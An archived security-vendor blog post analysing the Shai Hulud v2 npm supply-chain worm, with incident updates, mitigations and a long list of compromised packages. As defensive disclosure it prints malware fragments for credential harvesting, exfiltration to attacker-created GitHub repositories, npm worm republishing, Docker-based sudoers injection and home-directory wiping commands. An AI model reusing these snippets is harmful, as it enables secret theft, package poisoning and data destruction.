Shai Hulud Strikes Again (v2)
By Socket Research Team
Published: 2025-11-24 · Archived: 2026-04-29 02:09:47 UTC
Secure your dependencies with us
Socket proactively blocks malicious open source packages in your code.
Install
Update: November 26, 2025
PostHog has published a detailed post mortem describing how one of its GitHub Actions workflows
was abused as an initial access vector for Shai Hulud v2. An attacker briefly opened a pull request that
modified a script executed via pull_request_target , exfiltrated a bot personal access token from CI,
then used that access to steal additional GitHub secrets including an npm publish token and ship
https://socket.dev/blog/shai-hulud-strikes-again-v2
Page 1 of 29

malicious versions of several PostHog SDKs. PostHog has since revoked credentials, tightened
workflow reviews, moved to trusted publishing, and reworked its secrets management. Their write up
highlights how subtle CI workflow choices can create a path from untrusted contributions to package
release credentials.
Update: November 25, 2025
The Shai Hulud v2 campaign has primarily targeted the npm ecosystem, compromising hundreds of
packages and exposing secrets from tens of thousands of GitHub repositories.
We now also observe a spillover into the Java/Maven ecosystem: the Maven Central package
org.mvnpm:posthog-node:4.18.1 embeds the same Bun-based malicious payload
( bun_environment.js , SHA-1: d60ec97eea19fffb4809bc35b91033b52490ca11 ) and setup_bun.js
loader used in the npm campaign. This means the PostHog project has compromised releases in both
the JavaScript/npm and Java/Maven ecosystems, driven by the same Shai Hulud v2 payload. We
reported this compromised Maven package version to the Maven Central security team.
At 18:06 UTC (10:06 PST), the Maven Central team confirmed they were investigating the artifact and
explained that the org.mvnpm coordinates are produced via an automated mvnpm process that rebuilds
npm packages as Maven artifacts, and that they are working on additional procedures to prevent already
known compromised npm components from being rebundled.
At 18:50 UTC (10:50 PST), the PostHog team confirmed that they do not publish to Maven directly and
that the malicious npm version had already been removed from npm, with the Maven artifact
representing a mirrored copy of that release.
At 22:44 UTC (13:44 PST), the Maven Central team reported that they had purged the affected
components from Maven Central and taken steps to prevent any reintroduction of these compromised
artifacts.
Multiple npm packages from @zapier , @asyncapi , @postman , @posthog and @ensdomains have been
compromised via account takeover/developer compromise. The malicious actor has made the following changes in
these packages.
Added a preinstall script setup_bun.js in the package.json file
The setup_bun.js file is a stealthy loader that silently installs or locates the Bun runtime and then
executes a 10MB obfuscated and bundled malicious script ( bun_environment.js ) with all output
suppressed.
We will be updating the post with further technical analysis and list of additional packages.
Technical Analysis#
The attack uses a two-stage loader. When npm runs the preinstall script, it executes setup_bun.js , which:
1. Detects OS/architecture
2. Downloads or locates the Bun runtime for that platform
3. Caches Bun binary in ~/.cache or equivalent
4. Spawns a detached Bun process running bun_environment.js with POSTINSTALL_BG=1 flag
https://socket.dev/blog/shai-hulud-strikes-again-v2
Page 2 of 29

5. Suppresses all stdout/stderr and returns immediately
The package installation completes normally while the payload runs in the background.
C2 Discovery via GitHub Search#
Before executing its main payload, the malware attempts self-healing by searching public GitHub repositories for
the beacon phrase:
"Sha1-Hulud: The Second Coming."
If found, it:
1. Reads a stored file containing a GitHub access token
2. Decodes it through three layers: base64 → base64 → base64
3. Uses the recovered token as its primary credential for exfiltration
This makes the malware self-healing—if a victim deletes previous malicious repositories, the attacker can re-seed
victims through GitHub search. The beacon phrase also serves as a campaign signature for tracking infected
repositories.
Environment Fingerprinting#
The payload collects system information:
let _0x5735a8 = {
 'system': {
 'platform': _0x46410c["platform"], // windows/linux/darwin
 'architecture': _0x46410c["architecture"], // x86/x64/arm/arm64
 'hostname': a0_0xf22814["hostname"](),
 'os_user': a0_0xf22814["userInfo"](),
 },
 'modules': {
 'github': {
 'authenticated': _0x1b7dd4['isAuthenticated'](),
 'token': _0x1b7dd4['getCurrentToken'](),
 'username': _0x57709e,
 },
 },
};
It detects CI/CD environments by checking for:
GITHUB_ACTIONS + RUNNER_OS (executes Ry1() , cQ0() , pQ0() , gQ0() functions)
BUILDKITE
CODEBUILD_BUILD_NUMBER
https://socket.dev/blog/shai-hulud-strikes-again-v2
Page 3 of 29

CIRCLE_SHA1
PROJECT_ID
GitHub Actions Runner Privilege Escalation#
On GitHub Actions runners (Linux only), the malware attempts to gain root access through sudoers manipulation.
pQ0() - Sudoers Injection
First attempts passwordless sudo:
sudo -n true
If that fails, exploits Docker privileges to write /etc/sudoers.d/runner :
docker run --rm --privileged -v /:/host ubuntu bash -c \\
"cp /host/tmp/runner /host/etc/sudoers.d/runner"
This grants the malware passwordless root access on GitHub Actions runners.
gQ0() - DNS and Firewall Manipulation
Once privileged, the malware:
1. Stops systemd-resolved
2. Replaces DNS configuration from /tmp/resolved.conf
3. Restarts the resolver
4. Flushes iptables rules:
sudo iptables -F OUTPUT
sudo iptables -F DOCKER-USER
This provides network-level control within CI environments, enabling:
Man-in-the-middle attacks inside CI
Redirection of package installs to malicious mirrors
Blocking security scanners from reaching the internet
Prevention of security updates
Credential Collection#
1. Environment Variables
let _0x5bb75d = { 'environment': process["env"] };
https://socket.dev/blog/shai-hulud-strikes-again-v2
Page 4 of 29

Captures entire environment including GITHUB_TOKEN , NPM_TOKEN , AWS_ACCESS_KEY_ID ,
AWS_SECRET_ACCESS_KEY , and all CI-injected secrets.
2. TruffleHog Filesystem Scan
async function uy1(_0x5a0845) {
 let _0x51fad2 = new Tl();
 await _0x51fad2["initialize"]();
 let _0x192d24 = await _0x51fad2["scanFilesystem"](a0_0xf22814["homedir"]());
 await _0x5a0845['saveContents']("truffleSecrets.json", JSON["stringify"](_0x192d24));
}
The Tl class:
Downloads TruffleHog binary from github.com/trufflesecurity/trufflehog/releases
Caches it in ~/.truffler-cache
Runs trufflehog filesystem $HOME --json
Scans entire home directory for hardcoded secrets
3. Cloud Provider APIs
AWS Multi-Region Enumeration
The AWS collector ( WX ) aggressively enumerates secrets across all AWS regions, not just the default:
_0x3e4549 = {
 'aws': { 'secrets': await _0x30fddc["runSecrets"]() },
 'gcp': { 'secrets': await _0x79b1b9['listAndRetrieveAllSecrets']() },
 'azure': { 'secrets': await _0x8fa8f["listAndRetrieveAllSecrets"]() },
};
The AWS module loops through every available region, enumerating and dumping all secret values from AWS
Secrets Manager in each. This regional sweeping is unusually aggressive and significantly increases the credential
harvest in multi-region deployments.
GCP Secret Manager and Azure Key Vault are similarly enumerated to retrieve all accessible secrets.
4. GitHub Actions Secrets with Automated Credential Scraping
async function ky1(_0x4c25d7) {
 if (_0x4c25d7["isAuthenticated"]() && await _0x4c25d7["checkWorkflowScope"]()) {
 let _0x5b24e2 = new mq(_0x3c6fb2);
 let _0x42eae5 = _0x5b24e2["userReposUpdatedSince"]();
 for await(let _0x4ed63b of _0x5b24e2['processReposStream'](_0x42eae5))
 _0x2b1cf7["push"](_0x4ed63b);
https://socket.dev/blog/shai-hulud-strikes-again-v2
Page 5 of 29

return await _0x4c25d7["saveContents"]("actionsSecrets.json", JSON["stringify"](_0x2b1cf7));
 }
}
Enumerates user repositories and extracts GitHub Actions workflow secrets. The malware then mines this data for
NPM tokens (see worm propagation section).
Data Exfiltration#
Creates a GitHub repository in the victim's account using the stolen GitHub token. The repository name is
randomly generated:
function tL0() {
 return Array["from"]({ 'length': 0x12 }, () =>
 Math["random"]()['toString'](0x24)['slice'](0x2, 0x3))['join']('');
}
Some repositories are created with the description: "Sha1-Hulud: The Second Coming." as a campaign marker.
Triple-Base64 Encoding
All exfiltrated data is encoded through three layers of base64 before upload:
content → base64 → base64 → base64
This serves multiple anti-forensic purposes:
Evades GitHub's built-in secret scanning
Bypasses third-party secret detection tools
Makes casual browsing of repository contents ineffective
Complicates forensic analysis of stolen data
Uploads five JSON files to the victim's repository:
await _0x1b7dd4["createRepo"](tL0());
_0x1b7dd4["saveContents"]("contents.json", JSON["stringify"](_0x5735a8)); // System info + GitHub creds
_0x1b7dd4["saveContents"]("environment.json", JSON["stringify"](_0x5bb75d)); // All env vars
_0x1b7dd4["saveContents"]("cloud.json", JSON['stringify'](_0x3e4549)); // AWS/GCP/Azure secrets
_0x1b7dd4["saveContents"]("truffleSecrets.json", JSON["stringify"](_0x192d24));// TruffleHog findings
_0x1b7dd4["saveContents"]("actionsSecrets.json", JSON["stringify"](_0x2b1cf7));// GitHub Actions secrets
Worm Propagation#
Primary NPM Token Exploitation
https://socket.dev/blog/shai-hulud-strikes-again-v2
Page 6 of 29

async function El(_0x36c877) {
 let _0x23e1d9 = new Wl(_0x36c877);
 _0x4012c4 = await _0x23e1d9["validateToken"]();
 if (_0x4012c4) {
 let _0x8bd950 = await _0x23e1d9['getPackagesByMaintainer'](_0x4012c4, 0x64); // Get up to 100 packages
 await Promise["all"](_0x8bd950["map"](async _0x1d876b => {
 await _0x23e1d9['updatePackage'](_0x1d876b);
 }));
 }
}
For each valid NPM token:
1. Validates token against npm registry
2. Fetches all packages by that maintainer (max 100)
3. Calls updatePackage() on each package
The updatePackage() function:
Downloads the package tarball
Injects two new files: setup_bun.js and bun_environment.js
Patches package.json to add the preinstall script
Increments the patch version ( x.y.z → x.y.z+1 )
Publishes the new malicious version to npm
The patch-version bumping strategy makes infected packages harder to notice compared to major or minor version
changes.
Secondary Token Mining from GitHub Actions
Before giving up, the malware performs automated credential scraping on all GitHub Actions metadata, searching
for any string that starts with npm_ :
for (let [_0x11c4f3, _0x402786] of Object['entries'](_0x5998e5)) {
 if (typeof _0x402786 === "string" && _0x402786['startsWith']("npm_")) {
 if ((await El(_0x402786))["npmTokenValid"]) {
 await Promise["all"]([_0x6e06c0, _0x584734, _0x3adc69, _0x53223d]);
 process['exit'](0x0);
 }
 }
}
This creates a full CI → NPM takeover chain: compromised GitHub Actions workflows reveal NPM tokens
stored as secrets, which are then used to poison additional packages. This automated pivoting mechanism enables
https://socket.dev/blog/shai-hulud-strikes-again-v2
Page 7 of 29

the worm to bootstrap propagation even without direct NPM_TOKEN environment variables.
Destructive Payload#
If no GitHub token is available and no NPM token is valid, executes file destruction:
if (console['log']("Error 12"), _0x46410c["platform"] === "windows")
 Bun["spawnSync"](["cmd.exe", '/c',
 "del /F /Q /S \"%USERPROFILE%*\" && " +
 "for /d %%i in (\"%USERPROFILE%*\") do rd /S /Q \"%%i\" & " +
 "cipher /W:%USERPROFILE%"]);
else
 Bun["spawnSync"](["bash", '-c',
 'find "$HOME" -type f -writable -user "$(id -un)" -print0 | ' +
 'xargs -0 -r shred -uvz -n 1 && ' +
 'find "$HOME" -depth -type d -empty -delete']);
Windows: Deletes all files in %USERPROFILE% , removes directories, overwrites free space with cipher /W
Linux/macOS: Finds all writable user files, shreds them with single-pass overwrite, deletes empty directories
Stealth Mechanisms#
Background execution:
if (process["env"]["POSTINSTALL_BG"] !== '1') {
 Bun['spawn']([_0x4a3fc4, process["argv"][0x1]], {
 'env': { ...process["env"], 'POSTINSTALL_BG': '1' }
 })["unref"]();
 return;
}
Silent failure:
jy1()["catch"](_0x5ddff6 => {
 process["exit"](0x0); // Always exits with success code
});
All errors exit with code 0, suppressing npm warnings.
Mitigations & Defenses#
In the first Shai-Hulud Supply Chain compromise, the threat actor originally gained access through a
compromised maintainer account, and likely did again. It is therefore incredibly pertinent to ensure the safety of
your CI/CD pipeline.
https://socket.dev/blog/shai-hulud-strikes-again-v2
Page 8 of 29

Immediate Actions: If you have any of the packages listed above installed, remove them immediately and delete
your  node_modules  folder. If these packages were installed in environments with access to secrets or credentials,
rotate all API keys, tokens, and passwords immediately as the malicious code may have exfiltrated sensitive
information. Follow OpenJS' guidance and understand the pros and cons to the different approaches to publishing
to npm. Check GitHub for strange repos like those pictured below with the description, “Sha1-Hulud: The Second
Coming.”
Prevention:
Socket’s free GitHub app can ensure that whenever a new dependency is added in a pull request, you will be
informed about the package’s behavior and security risk. Socket Firewall will block malicious dependencies
before they reach your machine. Also consider:
Using package lock files and monitor your CI/CD pipeline continuously.
Enforcing immutable build steps and require review before modifying CI configurations.
Restricting who can trigger publishing workflows.
Preventing CI jobs from accessing unnecessary secrets.
Adding publication verification and require customers to verify provenance before trusting new versions.
Indicators of Compromise#
List of infected packages so far:-
1. @accordproject/concerto-analysis (v3.24.1)
2. @accordproject/concerto-linter (v3.24.1)
3. @accordproject/concerto-linter-default-ruleset (v3.24.1)
4. @accordproject/concerto-metamodel (v3.12.5)
5. @accordproject/concerto-types (v3.24.1)
6. @accordproject/concerto-types (v3.24.1)
7. @accordproject/markdown-it-cicero (v0.16.26)
8. @accordproject/template-engine (v2.7.2)
https://socket.dev/blog/shai-hulud-strikes-again-v2
Page 9 of 29

9. @actbase/css-to-react-native-transform (v1.0.3)
10. @actbase/css-to-react-native-transform (v1.0.3)
11. @actbase/native (v0.1.32)
12. @actbase/node-server (v1.1.19)
13. @actbase/react-absolute (v0.8.3)
14. @actbase/react-daum-postcode (v1.0.5)
15. @actbase/react-kakaosdk (v0.9.27)
16. @actbase/react-native-actionsheet (v1.0.3)
17. @actbase/react-native-devtools (v0.1.3)
18. @actbase/react-native-fast-image (v8.5.13)
19. @actbase/react-native-kakao-channel (v1.0.2)
20. @actbase/react-native-kakao-navi (v2.0.4)
21. @actbase/react-native-less-transformer (v1.0.6)
22. @actbase/react-native-naver-login (v1.0.1)
23. @actbase/react-native-simple-video (v1.0.13)
24. @actbase/react-native-tiktok (v1.1.3)
25. @afetcan/api (v0.0.13)
26. @afetcan/storage (v0.0.27)
27. @alaan/s2s-auth (v2.0.3)
28. @alexadark/amadeus-api (v1.0.4)
29. @alexadark/gatsby-theme-events (v1.0.1)
30. @alexadark/gatsby-theme-wordpress-blog (v2.0.1)
31. @alexadark/reusable-functions (v1.5.1)
32. @alexcolls/nuxt-socket.io (v0.0.7, v0.0.8)
33. @alexcolls/nuxt-ux (v0.6.1, v0.6.2)
34. @antstackio/eslint-config-antstack (v0.0.3)
35. @antstackio/express-graphql-proxy (v0.2.8)
36. @antstackio/graphql-body-parser (v0.1.1)
37. @antstackio/json-to-graphql (v1.0.3)
38. @antstackio/shelbysam (v1.1.7)
39. @aryanhussain/my-angular-lib (v0.0.23)
40. @asyncapi/avro-schema-parser (v3.0.25)
41. @asyncapi/avro-schema-parser (v3.0.26)
42. @asyncapi/bundler (v0.6.5, v0.6.6)
43. @asyncapi/bundler (v0.6.6)
44. @asyncapi/cli (v4.1.2)
45. @asyncapi/cli (v4.1.3)
46. @asyncapi/converter (v1.6.3)
47. @asyncapi/converter (v1.6.4)
48. @asyncapi/diff (v0.5.1)
49. @asyncapi/diff (v0.5.2)
50. @asyncapi/dotnet-rabbitmq-template (v1.0.1)
https://socket.dev/blog/shai-hulud-strikes-again-v2
Page 10 of 29

51. @asyncapi/dotnet-rabbitmq-template (v1.0.2)
52. @asyncapi/edavisualiser (v1.2.1)
53. @asyncapi/edavisualiser (v1.2.2)
54. @asyncapi/generator (v2.8.5)
55. @asyncapi/generator (v2.8.6)
56. @asyncapi/generator-components (v0.3.2)
57. @asyncapi/generator-components (v0.3.3)
58. @asyncapi/generator-helpers (v0.2.1)
59. @asyncapi/generator-helpers (v0.2.2)
60. @asyncapi/generator-react-sdk (v1.1.4)
61. @asyncapi/generator-react-sdk (v1.1.5)
62. @asyncapi/go-watermill-template (v0.2.76)
63. @asyncapi/go-watermill-template (v0.2.77)
64. @asyncapi/html-template (v3.3.2)
65. @asyncapi/html-template (v3.3.3)
66. @asyncapi/java-spring-cloud-stream-template (v0.13.5)
67. @asyncapi/java-spring-cloud-stream-template (v0.13.6)
68. @asyncapi/java-spring-template (v1.6.1)
69. @asyncapi/java-spring-template (v1.6.2)
70. @asyncapi/java-template (v0.3.5)
71. @asyncapi/java-template (v0.3.6)
72. @asyncapi/keeper (v0.0.2)
73. @asyncapi/keeper (v0.0.3)
74. @asyncapi/markdown-template (v1.6.8, v1.6.9)
75. @asyncapi/modelina (v5.10.2)
76. @asyncapi/modelina (v5.10.3)
77. @asyncapi/modelina-cli (v5.10.2)
78. @asyncapi/modelina-cli (v5.10.3)
79. @asyncapi/multi-parser (v2.2.1)
80. @asyncapi/multi-parser (v2.2.2)
81. @asyncapi/nodejs-template (v3.0.5)
82. @asyncapi/nodejs-template (v3.0.6)
83. @asyncapi/nodejs-ws-template (v0.10.1)
84. @asyncapi/nodejs-ws-template (v0.10.2)
85. @asyncapi/nunjucks-filters (v2.1.1)
86. @asyncapi/nunjucks-filters (v2.1.2)
87. @asyncapi/openapi-schema-parser (v3.0.25)
88. @asyncapi/openapi-schema-parser (v3.0.26)
89. @asyncapi/optimizer (v1.0.5)
90. @asyncapi/optimizer (v1.0.6)
91. @asyncapi/parser (v3.4.1)
92. @asyncapi/parser (v3.4.2)
https://socket.dev/blog/shai-hulud-strikes-again-v2
Page 11 of 29

93. @asyncapi/php-template (v0.1.1)
94. @asyncapi/php-template (v0.1.2)
95. @asyncapi/problem (v1.0.1)
96. @asyncapi/problem (v1.0.2)
97. @asyncapi/protobuf-schema-parser (v3.5.2, v3.6.1)
98. @asyncapi/protobuf-schema-parser (v3.5.3)
99. @asyncapi/python-paho-template (v0.2.14)
100. @asyncapi/python-paho-template (v0.2.15)
101. @asyncapi/react-component (v2.6.6)
102. @asyncapi/react-component (v2.6.7)
103. @asyncapi/server-api (v0.16.24)
104. @asyncapi/server-api (v0.16.25)
105. @asyncapi/specs (v6.8.2, v6.9.1, v6.10.1)
106. @asyncapi/specs (v6.8.3)
107. @asyncapi/studio (v1.0.2)
108. @asyncapi/studio (v1.0.3)
109. @asyncapi/web-component (v2.6.6)
110. @asyncapi/web-component (v2.6.7)
111. @bdkinc/knex-ibmi (v0.5.7)
112. @browserbasehq/bb9 (v1.2.21)
113. @browserbasehq/director-ai (v1.0.3)
114. @browserbasehq/mcp (v2.1.1)
115. @browserbasehq/mcp-server-browserbase (v2.4.2)
116. @browserbasehq/sdk-functions (v0.0.4)
117. @browserbasehq/stagehand (v3.0.4)
118. @browserbasehq/stagehand-docs (v1.0.1)
119. @caretive/caret-cli (v0.0.2)
120. @chtijs/eslint-config (v1.0.1)
121. @clausehq/flows-step-httprequest (v0.1.14)
122. @clausehq/flows-step-jsontoxml (v0.1.14)
123. @clausehq/flows-step-mqtt (v0.1.14)
124. @clausehq/flows-step-sendgridemail (v0.1.14)
125. @clausehq/flows-step-taskscreateurl (v0.1.14)
126. @cllbk/ghl (v1.3.1)
127. @commute/bloom (v1.0.3)
128. @commute/market-data (v1.0.2)
129. @commute/market-data-chartjs (v2.3.1)
130. @dev-blinq/ai-qa-logic (v1.0.19)
131. @dev-blinq/blinqioclient (v1.0.21)
132. @dev-blinq/cucumber_client (v1.0.738)
133. @dev-blinq/cucumber-js (v1.0.131)
134. @dev-blinq/ui-systems (v1.0.93)
https://socket.dev/blog/shai-hulud-strikes-again-v2
Page 12 of 29

135. @ensdomains/address-encoder (v1.1.5)
136. @ensdomains/blacklist (v1.0.1)
137. @ensdomains/buffer (v0.1.2)
138. @ensdomains/ccip-read-cf-worker (v0.0.4)
139. @ensdomains/ccip-read-dns-gateway (v0.1.1)
140. @ensdomains/ccip-read-router (v0.0.7)
141. @ensdomains/ccip-read-worker-viem (v0.0.4)
142. @ensdomains/content-hash (v3.0.1)
143. @ensdomains/curvearithmetics (v1.0.1)
144. @ensdomains/cypress-metamask (v1.2.1)
145. @ensdomains/dnsprovejs (v0.5.3)
146. @ensdomains/dnssec-oracle-anchors (v0.0.2)
147. @ensdomains/dnssecoraclejs (v0.2.9)
148. @ensdomains/durin (v0.1.2)
149. @ensdomains/durin-middleware (v0.0.2)
150. @ensdomains/ens-archived-contracts (v0.0.3)
151. @ensdomains/ens-avatar (v1.0.4)
152. @ensdomains/ens-contracts (v1.6.1)
153. @ensdomains/ens-test-env (v1.0.2)
154. @ensdomains/ens-validation (v0.1.1)
155. @ensdomains/ensjs (v4.0.3)
156. @ensdomains/ensjs-react (v0.0.5)
157. @ensdomains/eth-ens-namehash (v2.0.16)
158. @ensdomains/hackathon-registrar (v1.0.5)
159. @ensdomains/hardhat-chai-matchers-viem (v0.1.15)
160. @ensdomains/hardhat-toolbox-viem-extended (v0.0.6)
161. @ensdomains/mock (v2.1.52)
162. @ensdomains/name-wrapper (v1.0.1)
163. @ensdomains/offchain-resolver-contracts (v0.2.2)
164. @ensdomains/op-resolver-contracts (v0.0.2)
165. @ensdomains/react-ens-address (v0.0.32)
166. @ensdomains/renewal (v0.0.13)
167. @ensdomains/renewal-widget (v0.1.10)
168. @ensdomains/reverse-records (v1.0.1)
169. @ensdomains/server-analytics (v0.0.2)
170. @ensdomains/solsha1 (v0.0.4)
171. @ensdomains/subdomain-registrar (v0.2.4)
172. @ensdomains/test-utils (v1.3.1)
173. @ensdomains/thorin (v0.6.51)
174. @ensdomains/ui (v3.4.6)
175. @ensdomains/unicode-confusables (v0.1.1)
176. @ensdomains/unruggable-gateways (v0.0.3)
https://socket.dev/blog/shai-hulud-strikes-again-v2
Page 13 of 29

177. @ensdomains/vite-plugin-i18next-loader (v4.0.4)
178. @ensdomains/web3modal (v1.10.2)
179. @everreal/react-charts (v2.0.1)
180. @everreal/react-charts (v2.0.2)
181. @everreal/validate-esmoduleinterop-imports (v1.4.4, v1.4.5)
182. @everreal/web-analytics (v0.0.1, v0.0.2)
183. @faq-component/core (v0.0.4)
184. @faq-component/react (v1.0.1)
185. @fishingbooker/browser-sync-plugin (v1.0.5)
186. @fishingbooker/react-loader (v1.0.7)
187. @fishingbooker/react-pagination (v2.0.6)
188. @fishingbooker/react-raty (v2.0.1)
189. @fishingbooker/react-swiper (v0.1.5)
190. @hapheus/n8n-nodes-pgp (v1.5.1)
191. @hover-design/core (v0.0.1)
192. @hover-design/react (v0.2.1)
193. @huntersofbook/auth-vue (v0.4.2)
194. @huntersofbook/core (v0.5.1)
195. @huntersofbook/core-nuxt (v0.4.2)
196. @huntersofbook/form-naiveui (v0.5.1)
197. @huntersofbook/i18n (v0.8.2)
198. @huntersofbook/ui (v0.5.1)
199. @hyperlook/telemetry-sdk (v1.0.19)
200. @ifelsedeveloper/protocol-contracts-svm-idl (v0.1.2)
201. @ifelsedeveloper/protocol-contracts-svm-idl (v0.1.3)
202. @ifings/design-system (v4.9.2)
203. @ifings/metatron3 (v0.1.5)
204. @jayeshsadhwani/telemetry-sdk (v1.0.14)
205. @kvytech/cli (v0.0.7)
206. @kvytech/components (v0.0.2)
207. @kvytech/habbit-e2e-test (v0.0.2)
208. @kvytech/medusa-plugin-announcement (v0.0.8)
209. @kvytech/medusa-plugin-management (v0.0.5)
210. @kvytech/medusa-plugin-newsletter (v0.0.5)
211. @kvytech/medusa-plugin-product-reviews (v0.0.9)
212. @kvytech/medusa-plugin-promotion (v0.0.2)
213. @kvytech/web (v0.0.2)
214. @lessondesk/api-client (v9.12.2)
215. @lessondesk/api-client (v9.12.3)
216. @lessondesk/babel-preset (v1.0.1)
217. @lessondesk/electron-group-api-client (v1.0.3)
218. @lessondesk/eslint-config (v1.4.2)
https://socket.dev/blog/shai-hulud-strikes-again-v2
Page 14 of 29

219. @lessondesk/material-icons (v1.0.3)
220. @lessondesk/react-table-context (v2.0.4)
221. @lessondesk/schoolbus (v5.2.2, v5.2.3)
222. @livecms/live-edit (v0.0.32)
223. @livecms/nuxt-live-edit (v1.9.2)
224. @lokeswari-satyanarayanan/rn-zustand-expo-template (v1.0.9)
225. @louisle2/core (v1.0.1)
226. @louisle2/cortex-js (v0.1.6)
227. @lpdjs/firestore-repo-service (v1.0.1)
228. @lui-ui/lui-nuxt (v0.1.1)
229. @lui-ui/lui-tailwindcss (v0.1.2)
230. @lui-ui/lui-vue (v1.0.13)
231. @markvivanco/app-version-checker (v1.0.1, v1.0.2)
232. @mcp-use/cli (v2.2.6, v2.2.7)
233. @mcp-use/inspector (v0.6.2, v0.6.3)
234. @mcp-use/mcp-use (v1.0.1, v1.0.2)
235. @micado-digital/stadtmarketing-kufstein-external (v1.9.1)
236. @mizzle-dev/orm (v0.0.2)
237. @ntnx/passport-wso2 (v0.0.3)
238. @ntnx/t (v0.0.101)
239. @oku-ui/accordion (v0.6.2)
240. @oku-ui/alert-dialog (v0.6.2)
241. @oku-ui/arrow (v0.6.2)
242. @oku-ui/aspect-ratio (v0.6.2)
243. @oku-ui/avatar (v0.6.2)
244. @oku-ui/checkbox (v0.6.3)
245. @oku-ui/collapsible (v0.6.2)
246. @oku-ui/collection (v0.6.2)
247. @oku-ui/dialog (v0.6.2)
248. @oku-ui/direction (v0.6.2)
249. @oku-ui/dismissable-layer (v0.6.2)
250. @oku-ui/focus-guards (v0.6.2)
251. @oku-ui/focus-scope (v0.6.2)
252. @oku-ui/hover-card (v0.6.2)
253. @oku-ui/label (v0.6.2)
254. @oku-ui/menu (v0.6.2)
255. @oku-ui/motion (v0.4.4)
256. @oku-ui/motion-nuxt (v0.2.2)
257. @oku-ui/popover (v0.6.2)
258. @oku-ui/popper (v0.6.2)
259. @oku-ui/portal (v0.6.2)
260. @oku-ui/presence (v0.6.2)
https://socket.dev/blog/shai-hulud-strikes-again-v2
Page 15 of 29

261. @oku-ui/primitive (v0.6.2)
262. @oku-ui/primitives (v0.7.9)
263. @oku-ui/primitives-nuxt (v0.3.1)
264. @oku-ui/progress (v0.6.2)
265. @oku-ui/provide (v0.6.2)
266. @oku-ui/radio-group (v0.6.2)
267. @oku-ui/roving-focus (v0.6.2)
268. @oku-ui/scroll-area (v0.6.2)
269. @oku-ui/separator (v0.6.2)
270. @oku-ui/slider (v0.6.2)
271. @oku-ui/slot (v0.6.2)
272. @oku-ui/switch (v0.6.2)
273. @oku-ui/tabs (v0.6.2)
274. @oku-ui/toast (v0.6.2)
275. @oku-ui/toggle (v0.6.2)
276. @oku-ui/toggle-group (v0.6.2)
277. @oku-ui/toolbar (v0.6.2)
278. @oku-ui/tooltip (v0.6.2)
279. @oku-ui/use-composable (v0.6.2)
280. @oku-ui/utils (v0.6.2)
281. @oku-ui/visually-hidden (v0.6.2)
282. @orbitgtbelgium/mapbox-gl-draw-cut-polygon-mode (v2.0.5)
283. @orbitgtbelgium/mapbox-gl-draw-scale-rotate-mode (v1.1.1)
284. @orbitgtbelgium/orbit-components (v1.2.9)
285. @orbitgtbelgium/time-slider (v1.0.187)
286. @osmanekrem/bmad (v1.0.6)
287. @osmanekrem/error-handler (v1.2.2)
288. @pergel/cli (v0.11.1)
289. @pergel/module-box (v0.6.1)
290. @pergel/module-graphql (v0.6.1)
291. @pergel/module-ui (v0.0.9)
292. @pergel/nuxt (v0.25.5)
293. @posthog/agent (v1.24.1)
294. @posthog/ai (v7.1.2)
295. @posthog/automatic-cohorts-plugin (v0.0.8)
296. @posthog/bitbucket-release-tracker (v0.0.8)
297. @posthog/cli (v0.5.15)
298. @posthog/clickhouse (v1.7.1)
299. @posthog/core (v1.5.6)
300. @posthog/currency-normalization-plugin (v0.0.8)
301. @posthog/customerio-plugin (v0.0.8)
302. @posthog/databricks-plugin (v0.0.8)
https://socket.dev/blog/shai-hulud-strikes-again-v2
Page 16 of 29

303. @posthog/drop-events-on-property-plugin (v0.0.8)
304. @posthog/event-sequence-timer-plugin (v0.0.8)
305. @posthog/filter-out-plugin (v0.0.8)
306. @posthog/first-time-event-tracker (v0.0.8)
307. @posthog/geoip-plugin (v0.0.8)
308. @posthog/github-release-tracking-plugin (v0.0.8)
309. @posthog/gitub-star-sync-plugin (v0.0.8)
310. @posthog/heartbeat-plugin (v0.0.8)
311. @posthog/hedgehog-mode (v0.0.42)
312. @posthog/icons (v0.36.1)
313. @posthog/ingestion-alert-plugin (v0.0.8)
314. @posthog/intercom-plugin (v0.0.8)
315. @posthog/kinesis-plugin (v0.0.8)
316. @posthog/laudspeaker-plugin (v0.0.8)
317. @posthog/lemon-ui (v0.0.1)
318. @posthog/maxmind-plugin (v0.1.6)
319. @posthog/migrator3000-plugin (v0.0.8)
320. @posthog/netdata-event-processing (v0.0.8)
321. @posthog/nextjs (v0.0.3)
322. @posthog/nextjs-config (v1.5.1)
323. @posthog/nuxt (v1.2.9)
324. @posthog/pagerduty-plugin (v0.0.8)
325. @posthog/piscina (v3.2.1)
326. @posthog/plugin-contrib (v0.0.6)
327. @posthog/plugin-server (v1.10.8)
328. @posthog/plugin-unduplicates (v0.0.8)
329. @postman/pm-bin-linux-x64 (v1.24.3)
330. @postman/pm-bin-linux-x64 (v1.24.4)
331. @postman/pm-bin-linux-x64 (v1.24.5)
332. @posthog/postgres-plugin (v0.0.8)
333. @posthog/react-rrweb-player (v1.1.4)
334. @posthog/rrdom (v0.0.31)
335. @posthog/rrweb (v0.0.31)
336. @posthog/rrweb-player (v0.0.31)
337. @posthog/rrweb-record (v0.0.31)
338. @posthog/rrweb-replay (v0.0.19)
339. @posthog/rrweb-snapshot (v0.0.31)
340. @posthog/rrweb-utils (v0.0.31)
341. @posthog/sendgrid-plugin (v0.0.8)
342. @posthog/siphash (v1.1.2)
343. @posthog/snowflake-export-plugin (v0.0.8)
344. @posthog/taxonomy-plugin (v0.0.8)
https://socket.dev/blog/shai-hulud-strikes-again-v2
Page 17 of 29

345. @posthog/twilio-plugin (v0.0.8)
346. @posthog/twitter-followers-plugin (v0.0.8)
347. @posthog/url-normalizer-plugin (v0.0.8)
348. @posthog/variance-plugin (v0.0.8)
349. @posthog/web-dev-server (v1.0.5)
350. @posthog/wizard (v1.18.1)
351. @posthog/zendesk-plugin (v0.0.8)
352. @postman/aether-icons (v2.23.2, v2.23.3, v2.23.4)
353. @postman/csv-parse (v4.0.3, v4.0.4, v4.0.5)
354. @postman/final-node-keytar (v7.9.1, v7.9.2, v7.9.3)
355. @postman/mcp-ui-client (v5.5.1, v5.5.2, v5.5.3)
356. @postman/node-keytar (v7.9.4, v7.9.5, v7.9.6)
357. @postman/pm-bin-linux-x64 (v1.24.4, v1.24.5)
358. @postman/pm-bin-macos-arm64 (v1.24.3, v1.24.4, v1.24.5)
359. @postman/pm-bin-macos-x64 (v1.24.3, v1.24.4)
360. @postman/pm-bin-windows-x64 (v1.24.3, v1.24.4, v1.24.5)
361. @postman/postman-collection-fork (v4.3.3, v4.3.4, v4.3.5)
